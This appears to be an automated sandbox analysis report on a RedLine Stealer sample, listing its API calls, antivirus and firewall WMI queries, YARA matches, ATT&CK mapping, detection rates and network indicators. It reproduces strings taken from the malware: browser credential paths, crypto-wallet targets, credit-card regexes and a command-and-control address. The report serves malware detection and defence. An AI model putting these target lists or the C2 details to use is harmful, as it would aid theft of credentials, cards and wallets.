                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: Electrum
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: ssnMaestro Cardcookies.sqlite\Program Files (x86)\configJCB Card Safari/537.36\Google\Chrome\User DataKoreanLocalCardemail3[47][0-9]{13}$GuardaArmoryLocalAppDatadisplayNamehost_key^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$\user.configNameatomictdata\K-Meleon\Torch\User Data\CatalinaGroup\Citrio\User Data^3(?:0[0-5]|[68][0-9])[0-9]{11}$\NVIDIA Corporation\NVIDIA GeForce ExperienceexpireDatelastNameexpires_utc//setting[@name='Username']/valueusertagttp://checkip.amazonaws.com/Mozilla/5.0 (^(6541|6556)[0-9]{12}$logins.jsonovpn\BraveSoftware\Brave-Browser\User Data\Program Data\Laser CardexpirationDate\Epic Privacy Browser\User DataExodus\Opera Software\DisplayVersion%localappdata%\settingsprotocol^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$\Elements Browser\User Data%DSK_23%cmdOpera GX4[0-9]{12}(?:[0-9]{3})?$cookiesAccountInfo.txtaddress\Chedot\User Datacom.liberty.jaxx\Comodo\IceDragon^3[47][0-9]{13}$dob\Sputnik\Sputnik\User Datakey4.dbWeb DataSELECT ExecutablePath, ProcessID FROM Win32_ProcessAtomicWin32_OperatingSystemDiners Club Card\Kometa\User DataSteamPathkey3.db\MapleStudio\ChromePlus\User Datawaasflleasft.datasf; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/CommandLineProtonVPN.exe\Telegram Desktop\tdataSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CocCoc\Browser\User Data\Orbitum\User Data\Uran\User Datapassword-checkProcessID\7Star\7Star\User Data\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerCookies\Iridium\User DataAmex Cardis_secureSoftware\Valve\SteamLogin DataID: isSecureVisa Card5[1-5][0-9]{14}$\Google(x86)\Chrome\User Data{0}\.purple\accounts.xmlDiscover Cardwaasflletasf\Chromium\User DataNordVPNv11^9[0-9]{15}$Coinomi) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$\NETGATE Technologies\BlackHaw\uCozMedia\Uran\User DataInsta Payment Card^63[7-9][0-9]{13}$\Program Files\pin//setting[@name='Password']/valueOpera GX Stable\liebao\User DataSELECT * FROM Win32_Process Where SessionId='\Comodo\Dragon\User Data\360Browser\Browser\User DatafirstName\Coowon\Coowon\User Datassfnname\Mozilla\Firefoxphone_number\Mail.Ru\Atom\User DataEthereum\wallets^(62[0-9]{14,17})$.vdfcard_number_encrypted, Name: Union Pay CardCarte Blanche CardAppData\Roaming\Version\Chromodo\User Datacredit_cards^389[0-9]{11}$^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$hostpasswordUsername_valuemoz_cookiesUser Datawindows-1251, CommandLine: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\Nichrome\User DataWindows NTkey_dataDisplayNamex64Solo Card*.walletorigin_urlpassword_valueVisa Master Cardlast_nameNordVpn.exe*expirySwitch CardJaxxpath\CentBrowser\User Data\Vivaldi\User Datax
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: l3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: l/C:\Users\user\AppData\Roaming\Ethereum\wallets
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: Exodus
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: Ethereum
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Path InterceptionPath InterceptionMasquerading1OS Credential Dumping1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23Input Capture1Security Software Discovery261Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery12Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery134Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe75%VirustotalBrowse
                      SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe32%MetadefenderBrowse
                      SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe76%ReversingLabsWin32.Trojan.Masslogger
                      SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe100%AviraHEUR/AGEN.1139343
                      SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.0.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.400000.0.unpack100%AviraHEUR/AGEN.1139343Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://service.r0%URL Reputationsafe
                      http://service.r0%URL Reputationsafe
                      http://service.r0%URL Reputationsafe
                      http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange0%Avira URL Cloudsafe
                      http://schemas.datacontract.org0%URL Reputationsafe
                      http://schemas.datacontract.org0%URL Reputationsafe
                      http://schemas.datacontract.org0%URL Reputationsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://tempuri.org/IRemotePanel/GetTasksResponse0%Avira URL Cloudsafe
                      http://tempuri.org/IRemotePanel/SendClientInfo0%Avira URL Cloudsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://ns.adobe.c/go0%Avira URL Cloudsafe
                      http://tempuri.org/00%Avira URL Cloudsafe
                      http://ns.adobe.cobjo0%Avira URL Cloudsafe
                      http://support.a0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://tempuri.org/IRemotePanel/GetSettingsResponse0%Avira URL Cloudsafe
                      http://45.14.13.58:32140%Avira URL Cloudsafe
                      http://api.ip.sb0%Avira URL Cloudsafe
                      http://tempuri.org/IRemotePanel/SendClientInfoResponse0%Avira URL Cloudsafe
                      http://tempuri.org/IRemotePanel/GetTasks0%Avira URL Cloudsafe
                      https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy0%Avira URL Cloudsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      https://api.ip.sb0%Avira URL Cloudsafe
                      https://helpx.ad0%URL Reputationsafe
                      https://helpx.ad0%URL Reputationsafe
                      https://helpx.ad0%URL Reputationsafe
                      http://45.14.13.58:321440%Avira URL Cloudsafe
                      http://45.14.13.58:3214/0%Avira URL Cloudsafe
                      http://checkip.dyndns.org0%Avira URL Cloudsafe
                      http://tempuri.org/IRemotePanel/CompleteTaskResponse0%Avira URL Cloudsafe
                      https://get.adob0%URL Reputationsafe
                      https://get.adob0%URL Reputationsafe
                      https://get.adob0%URL Reputationsafe
                      http://forms.rea0%URL Reputationsafe
                      http://forms.rea0%URL Reputationsafe
                      http://forms.rea0%URL Reputationsafe
                      http://tempuri.org/IRemotePanel/CompleteTask0%Avira URL Cloudsafe
                      http://crl4.dig0%Avira URL Cloudsafe
                      http://tempuri.org/IRemotePanel/GetSettings0%Avira URL Cloudsafe
                      http://ns.ado/1o0%Avira URL Cloudsafe
                      http://ns.ado/10%URL Reputationsafe
                      http://ns.ado/10%URL Reputationsafe
                      http://ns.ado/10%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ianawhois.vip.icann.org
                      192.0.47.59
                      truefalse
                        high
                        api.ip.sb
                        unknown
                        unknowntrue
                          unknown
                          whois.iana.org
                          unknown
                          unknownfalse
                            high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://45.14.13.58:3214/false
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                              high
                              http://service.rSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://icanhazip.comSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                  high
